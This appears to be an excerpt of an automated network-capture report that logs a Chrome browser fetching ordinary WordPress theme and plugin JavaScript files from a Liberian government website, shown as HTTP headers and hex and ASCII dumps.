                                                                                                                        ETag: "23b5-615232a51cfcc"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 9141
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:48 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:48 UTC7824INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 32 30 35 38 3a 28 74 2c 65 2c 72 29 3d 3e 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 7b 6e 6f 74 5f 73 74 72 69 6e 67 3a 2f 5b 5e 73 5d 2f 2c 6e 6f 74 5f 62 6f 6f 6c 3a 2f 5b 5e 74 5d 2f 2c 6e 6f 74 5f 74 79 70 65 3a 2f 5b 5e 54 5d 2f 2c 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 3a 2f 5b 5e 76 5d 2f 2c 6e 75 6d 62 65 72 3a 2f 5b 64 69 65 66 67 5d 2f 2c 6e 75 6d 65 72 69 63 5f 61 72 67 3a 2f 5b 62 63 64 69 65 66 67 75 78 58 5d 2f 2c 6a 73 6f 6e 3a 2f 5b 6a 5d 2f 2c 6e 6f 74 5f 6a 73 6f 6e 3a 2f 5b 5e 6a 5d 2f 2c 74 65 78 74 3a 2f 5e 5b 5e 5c 78 32
                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x2
                                                                                                                        2025-01-10 13:54:48 UTC1317INData Raw: 22 2c 22 63 6f 72 65 2f 69 31 38 6e 22 2c 74 29 7d 72 65 74 75 72 6e 7b 67 65 74 4c 6f 63 61 6c 65 44 61 74 61 3a 28 74 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 6e 2e 64 61 74 61 5b 74 5d 2c 73 65 74 4c 6f 63 61 6c 65 44 61 74 61 3a 73 2c 61 64 64 4c 6f 63 61 6c 65 44 61 74 61 3a 28 74 2c 65 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 7b 6e 2e 64 61 74 61 5b 65 5d 3d 7b 2e 2e 2e 6e 2e 64 61 74 61 5b 65 5d 2c 2e 2e 2e 74 2c 22 22 3a 7b 2e 2e 2e 68 2c 2e 2e 2e 6e 2e 64 61 74 61 5b 65 5d 3f 2e 5b 22 22 5d 2c 2e 2e 2e 74 3f 2e 5b 22 22 5d 7d 7d 2c 64 65 6c 65 74 65 20 6e 2e 70 6c 75 72 61 6c 46 6f 72 6d 73 5b 65 5d 2c 61 28 29 7d 2c 72 65 73 65 74 4c 6f 63 61 6c 65 44 61 74 61 3a 28 74 2c 65 29 3d 3e 7b 6e 2e 64 61 74 61 3d 7b 7d 2c 6e 2e 70 6c 75 72 61 6c 46 6f 72
                                                                                                                        Data Ascii: ","core/i18n",t)}return{getLocaleData:(t="default")=>n.data[t],setLocaleData:s,addLocaleData:(t,e="default")=>{n.data[e]={...n.data[e],...t,"":{...h,...n.data[e]?.[""],...t?.[""]}},delete n.pluralForms[e],a()},resetLocaleData:(t,e)=>{n.data={},n.pluralFor


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        39192.168.2.74982969.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC459OUTGET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0.2 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:48 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Sun, 22 Dec 2024 08:44:45 GMT
                                                                                                                        ETag: "30e0-629d7e45429ff"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 12512
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:48 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:48 UTC7823INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 69 29 3d 3e 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 69 29 74 2e 6f 28 69 2c 73 29 26 26 21 74 2e 6f 28 65 2c 73 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 73 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 69 5b 73 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 53
                                                                                                                        Data Ascii: (()=>{"use strict";var t={d:(e,i)=>{for(var s in i)t.o(i,s)&&!t.o(e,s)&&Object.defineProperty(e,s,{enumerable:!0,get:i[s]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,S
                                                                                                                        2025-01-10 13:54:48 UTC4689INData Raw: 61 62 6c 65 64 2e 31 32 22 29 2c 74 2e 73 65 74 28 22 73 6c 64 78 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6f 70 65 6e 78 6d 6c 66 6f 72 6d 61 74 73 2d 6f 66 66 69 63 65 64 6f 63 75 6d 65 6e 74 2e 70 72 65 73 65 6e 74 61 74 69 6f 6e 6d 6c 2e 73 6c 69 64 65 22 29 2c 74 2e 73 65 74 28 22 73 6c 64 6d 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 70 6f 77 65 72 70 6f 69 6e 74 2e 73 6c 69 64 65 2e 6d 61 63 72 6f 45 6e 61 62 6c 65 64 2e 31 32 22 29 2c 74 2e 73 65 74 28 22 6f 6e 65 74 6f 63 7c 6f 6e 65 74 6f 63 32 7c 6f 6e 65 74 6d 70 7c 6f 6e 65 70 6b 67 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 6e 65 6e 6f 74 65 22 29 2c 74 2e 73 65 74 28 22 6f 78 70 73 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 78 70 73 22 29 2c
                                                                                                                        Data Ascii: abled.12"),t.set("sldx","application/vnd.openxmlformats-officedocument.presentationml.slide"),t.set("sldm","application/vnd.ms-powerpoint.slide.macroEnabled.12"),t.set("onetoc|onetoc2|onetmp|onepkg","application/onenote"),t.set("oxps","application/oxps"),


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        40192.168.2.74982869.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC613OUTGET /wp-content/themes/betheme/js/menu.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "b2b-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 2859
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:48 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:49 UTC2859INData Raw: 2f 2a 2a 0a 20 2a 20 4d 75 66 66 69 6e 4d 65 6e 75 0a 20 2a 0a 20 2a 20 48 6f 72 69 7a 6f 6e 74 61 6c 20 4d 75 6c 74 69 6c 65 76 65 6c 20 4d 65 6e 75 20 77 69 74 68 20 57 50 20 4d 65 67 61 4d 65 6e 75 20 53 75 70 70 6f 72 74 0a 20 2a 20 33 2e 30 20 7c 20 4d 75 66 66 69 6e 20 47 72 6f 75 70 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 0a 09 2f 2a 20 67 6c 6f 62 61 6c 73 20 6a 51 75 65 72 79 20 2a 2f 0a 0a 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 24 2e 66 6e 2e 6d 66 6e 4d 65 6e 75 20 3d 20 66 75 6e 63 74 69 6f 6e 28 6f 70 74 69 6f 6e 73 29 20 7b 0a 0a 20 20 20 20 76 61 72 20 6d 65 6e 75 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 20 20 20 20 76 61 72 20 64 65 66 61 75 6c 74 73 20 3d 20 7b 0a 20 20 20 20 20 20 61 64 64 4c 61 73
                                                                                                                        Data Ascii: /** * MuffinMenu * * Horizontal Multilevel Menu with WP MegaMenu Support * 3.0 | Muffin Group */(function($) {/* globals jQuery */ "use strict"; $.fn.mfnMenu = function(options) { var menu = $(this); var defaults = { addLas


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        41192.168.2.74983069.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC628OUTGET /wp-content/themes/betheme/js/plugins/visible.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC366INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "260-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 608
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:49 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:49 UTC608INData Raw: 2f 2a 2a 0a 20 2a 20 56 69 73 69 62 6c 65 0a 20 2a 20 72 65 71 75 69 72 65 64 20 66 6f 72 3a 20 4f 6e 65 20 50 61 67 65 20 41 63 74 69 76 65 0a 20 2a 20 53 61 6d 20 53 65 68 6e 65 72 74 2c 20 73 61 6d 61 74 64 66 2c 20 54 65 61 6d 44 46 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 65 61 6d 64 66 2f 6a 71 75 65 72 79 2d 76 69 73 69 62 6c 65 2f 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 66 6e 2e 76 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 69 3d 65 28 74 68 69 73 29 2e 65 71 28 30 29 2c 73 3d 69 2e 67 65 74 28 30 29 2c 6f 3d 65 28 77 69 6e 64 6f 77 29 2c 75 3d 6f 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 61 3d 75 2b 6f 2e 68 65 69 67 68 74 28 29 2c 66 3d 6f 2e 73 63 72 6f 6c 6c 4c
                                                                                                                        Data Ascii: /** * Visible * required for: One Page Active * Sam Sehnert, samatdf, TeamDF | https://github.com/teamdf/jquery-visible/ */(function(e){e.fn.visible=function(t,n,r){var i=e(this).eq(0),s=i.get(0),o=e(window),u=o.scrollTop(),a=u+o.height(),f=o.scrollL


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        42192.168.2.74983169.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC455OUTGET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0.2 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Sun, 22 Dec 2024 08:44:45 GMT
                                                                                                                        ETag: "348c-629d7e4541a5f"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 13452
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:49 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:49 UTC7823INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 77 69 6e 64 6f 77 2e 77 70 2e 69 31 38 6e 2c 74 3d 65 3d 3e 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 2c 61 3d 28 65 2c 74 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 60 77 70 63 66 37 24 7b 74 7d 60 2c 7b 62 75 62 62 6c 65 73 3a 21 30 2c 64 65 74 61 69 6c 3a 61 7d 29 3b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 29 2c 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 29 7d 2c 6e 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 4d 61 70 28 5b 5b 22 69 6e 69 74 22 2c 22 69 6e 69 74 22 5d
                                                                                                                        Data Ascii: (()=>{"use strict";const e=window.wp.i18n,t=e=>Math.abs(parseInt(e,10)),a=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=(e,t)=>{const n=new Map([["init","init"]
                                                                                                                        2025-01-10 13:54:49 UTC5629INData Raw: 66 6f 72 6d 3a 74 2c 64 65 74 61 69 6c 3a 61 7d 3d 65 2e 77 70 63 66 37 3b 64 28 74 29 2c 6e 28 74 2c 22 72 65 73 65 74 74 69 6e 67 22 29 7d 72 65 74 75 72 6e 20 74 28 65 29 7d 29 29 3b 63 6f 6e 73 74 20 75 3d 28 65 2c 74 29 3d 3e 7b 66 6f 72 28 63 6f 6e 73 74 20 61 20 69 6e 20 74 29 7b 63 6f 6e 73 74 20 6e 3d 74 5b 61 5d 3b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 24 7b 61 7d 22 5d 60 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 76 61 6c 75 65 3d 22 22 7d 29 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 69 6d 67 2e 77 70 63 66 37 2d 63 61 70 74 63 68 61 2d 24 7b 61 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 3a 22 2c 22 22 29 7d 60 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65
                                                                                                                        Data Ascii: form:t,detail:a}=e.wpcf7;d(t),n(t,"resetting")}return t(e)}));const u=(e,t)=>{for(const a in t){const n=t[a];e.querySelectorAll(`input[name="${a}"]`).forEach((e=>{e.value=""})),e.querySelectorAll(`img.wpcf7-captcha-${a.replaceAll(":","")}`).forEach((e=>{e


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        43192.168.2.74983369.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC438OUTGET /wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.3 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Fri, 27 Sep 2024 11:06:30 GMT
                                                                                                                        ETag: "2ee8-62317d8e000f8"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 12008
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:49 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:49 UTC7823INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 54 61 62 73 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75
                                                                                                                        Data Ascii: /*! * jQuery UI Tabs 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(t){"use strict";"function"==typeof define&&define.amd?define(["jqu
                                                                                                                        2025-01-10 13:54:49 UTC4185INData Raw: 68 74 28 4d 61 74 68 2e 6d 61 78 28 30 2c 69 2d 6c 28 74 68 69 73 29 2e 69 6e 6e 65 72 48 65 69 67 68 74 28 29 2b 6c 28 74 68 69 73 29 2e 68 65 69 67 68 74 28 29 29 29 7d 29 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 22 2c 22 61 75 74 6f 22 29 29 3a 22 61 75 74 6f 22 3d 3d 3d 74 26 26 28 69 3d 30 2c 74 68 69 73 2e 70 61 6e 65 6c 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 3d 4d 61 74 68 2e 6d 61 78 28 69 2c 6c 28 74 68 69 73 29 2e 68 65 69 67 68 74 28 22 22 29 2e 68 65 69 67 68 74 28 29 29 7d 29 2e 68 65 69 67 68 74 28 69 29 29 7d 2c 5f 65 76 65 6e 74 48 61 6e 64 6c 65 72 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 69 3d 74 68 69 73 2e 61 63 74 69 76 65 2c 61 3d 6c 28 74 2e 63 75 72 72 65 6e
                                                                                                                        Data Ascii: ht(Math.max(0,i-l(this).innerHeight()+l(this).height()))}).css("overflow","auto")):"auto"===t&&(i=0,this.panels.each(function(){i=Math.max(i,l(this).height("").height())}).height(i))},_eventHandler:function(t){var e=this.options,i=this.active,a=l(t.curren


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        44192.168.2.74983269.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC638OUTGET /wp-content/themes/betheme/assets/animations/animations.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "726-60e9383bc7b56"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 1830
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:49 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:49 UTC1830INData Raw: 2f 2a 2a 0a 20 2a 20 41 6e 69 6d 61 74 69 6f 6e 73 20 76 31 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2c 20 4a 6f 65 20 4d 6f 74 74 65 72 73 68 61 77 2c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6a 6f 65 6d 6f 74 74 65 72 73 68 61 77 2f 0a 20 2a 2f 0a 0a 66 75 6e 63 74 69 6f 6e 20 61 6e 69 6d 61 74 65 45 6c 65 6d 65 6e 74 28 29 7b 6a 51 75 65 72 79 28 22 2e 61 6e 69 6d 61 74 65 22 29 2e 65 61 63 68 28 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 3e 3d 39 36 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 6e 29 7b 76 61 72 20 6e 3d 6a 51 75 65 72 79 28 6e 29 2c 69 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 61 6e 69 6d 2d 74 79 70 65 22 29 2c 74 3d 6a 51 75 65 72 79 28 74 68 69 73
                                                                                                                        Data Ascii: /** * Animations v1.4 * Copyright 2014, Joe Mottershaw, https://github.com/joemottershaw/ */function animateElement(){jQuery(".animate").each(jQuery(window).width()>=96?function(a,n){var n=jQuery(n),i=jQuery(this).attr("data-anim-type"),t=jQuery(this


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        45192.168.2.74983469.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC632OUTGET /wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
